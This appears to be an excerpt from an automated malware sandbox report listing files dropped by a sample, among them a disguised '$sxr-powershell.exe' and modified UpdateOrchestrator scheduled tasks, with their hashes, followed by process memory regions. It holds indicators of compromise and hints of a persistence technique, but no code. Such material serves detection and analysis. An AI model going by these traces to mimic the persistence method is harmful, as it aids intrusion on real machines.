                                                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                                    Filesize

                                                                                                                    409KB

                                                                                                                    MD5

                                                                                                                    7417c8c73e614f293152575f46134216

                                                                                                                    SHA1

                                                                                                                    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                                    SHA256

                                                                                                                    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                                    SHA512

                                                                                                                    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                    SHA1

                                                                                                                    98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                    SHA256

                                                                                                                    ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                    SHA512

                                                                                                                    c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    f313c5b4f95605026428425586317353

                                                                                                                    SHA1

                                                                                                                    06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                    SHA256

                                                                                                                    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                    SHA512

                                                                                                                    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                    SHA1

                                                                                                                    a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                    SHA256

                                                                                                                    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                    SHA512

                                                                                                                    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                    SHA1

                                                                                                                    63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                    SHA256

                                                                                                                    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                    SHA512

                                                                                                                    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                    SHA1

                                                                                                                    5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                    SHA256

                                                                                                                    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                    SHA512

                                                                                                                    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                    Filesize

                                                                                                                    2KB

                                                                                                                    MD5

                                                                                                                    0b990e24f1e839462c0ac35fef1d119e

                                                                                                                    SHA1

                                                                                                                    9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                    SHA256

                                                                                                                    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                    SHA512

                                                                                                                    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                    Filesize

                                                                                                                    330B

                                                                                                                    MD5

                                                                                                                    6f6bd527e48234a4147f3f98fb52fbc4

                                                                                                                    SHA1

                                                                                                                    948d78d532b2af56322bf4f9463c6dc2e06320e7

                                                                                                                    SHA256

                                                                                                                    b52f4ad654a98a927095355d0e5e58d4b7ce3e088beb006fbca7e5119f55a808

                                                                                                                    SHA512

                                                                                                                    132882cdfe603bcfedddeb5ffc9a18028c640d2ad89729055f199a537de609c8a60782217286648cd7e9f8351a781ba5aa988ac70d030c6b43773b172da0ddec

                                                                                                                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                    Filesize

                                                                                                                    330B

                                                                                                                    MD5

                                                                                                                    00c33436027c89a7f8b704bd5d150534

                                                                                                                    SHA1

                                                                                                                    8bdf658d6f54b8cab6c14cf87e1ec2ec0317130c

                                                                                                                    SHA256

                                                                                                                    a8d036955993c2caa75849c292050416d351f969e7a93f6073f4bfe4f0a09802

                                                                                                                    SHA512

                                                                                                                    3cf2c43beb4aa2bf7fd3e07f05c41de1ea5afb1c0b5b73551dd16650bda5127e5c227a86cabb99f2bd354cf0028c25478641185adee14cab1cae7a33532cc12c

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_tf2fjbwj.aki.ps1
                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                    Filesize

                                                                                                                    412B

                                                                                                                    MD5

                                                                                                                    4b2c8e3140b0f506383f36b037bfe3c7

                                                                                                                    SHA1

                                                                                                                    70d995d89f6428f16b1aa3ba284e1902b3c7f010

                                                                                                                    SHA256

                                                                                                                    57f933e72eb8c9450d5765261a96758bca285b594be725c55bba5632de5ba161

                                                                                                                    SHA512

                                                                                                                    8ec429e514d75f6e1d8d3936c7db9836606872988f11dbcc7b831b0cab059606f74e037be2d77b15bb98e9940e30be1c6da8de0d93038b6e026b07be13b4fc02

                                                                                                                  • memory/388-84-0x000001C6567A0000-0x000001C6567CB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/388-91-0x00007FF8DE270000-0x00007FF8DE280000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/388-90-0x000001C6567A0000-0x000001C6567CB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/632-49-0x000001BC61DA0000-0x000001BC61DC5000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    148KB

                                                                                                                  • memory/632-58-0x00007FF8DE270000-0x00007FF8DE280000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/632-57-0x000001BC61DD0000-0x000001BC61DFB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/632-51-0x000001BC61DD0000-0x000001BC61DFB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/632-50-0x000001BC61DD0000-0x000001BC61DFB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/684-69-0x00007FF8DE270000-0x00007FF8DE280000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/684-62-0x000001E6DB000000-0x000001E6DB02B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/684-68-0x000001E6DB000000-0x000001E6DB02B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/752-95-0x0000017068120000-0x000001706814B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/968-79-0x0000018D8D5D0000-0x0000018D8D5FB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/968-73-0x0000018D8D5D0000-0x0000018D8D5FB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/968-80-0x00007FF8DE270000-0x00007FF8DE280000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/1840-14-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/1840-13-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/1840-841-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/1840-842-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/1840-20-0x0000000006E00000-0x0000000006E0A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/2616-5-0x0000000004B00000-0x0000000004B66000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/2616-2-0x0000000004EB0000-0x0000000005454000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                  • memory/2616-0-0x000000007491E000-0x000000007491F000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2616-6-0x0000000005720000-0x0000000005732000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/2616-7-0x0000000005C60000-0x0000000005C9C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    240KB

                                                                                                                  • memory/2616-4-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/2616-3-0x0000000004A60000-0x0000000004AF2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    584KB

                                                                                                                  • memory/2616-1-0x00000000000E0000-0x000000000014C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    432KB

                                                                                                                  • memory/2616-22-0x0000000074910000-0x00000000750C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                  • memory/3904-43-0x00007FF91C530000-0x00007FF91C5EE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/3904-46-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3904-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3904-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3904-42-0x00007FF91E1F0000-0x00007FF91E3E5000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/3904-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3904-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/3904-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4568-32-0x000002096F130000-0x000002096F152000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/4568-33-0x000002096F180000-0x000002096F1AA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/4568-35-0x00007FF91C530000-0x00007FF91C5EE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/4568-34-0x00007FF91E1F0000-0x00007FF91E3E5000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.0MB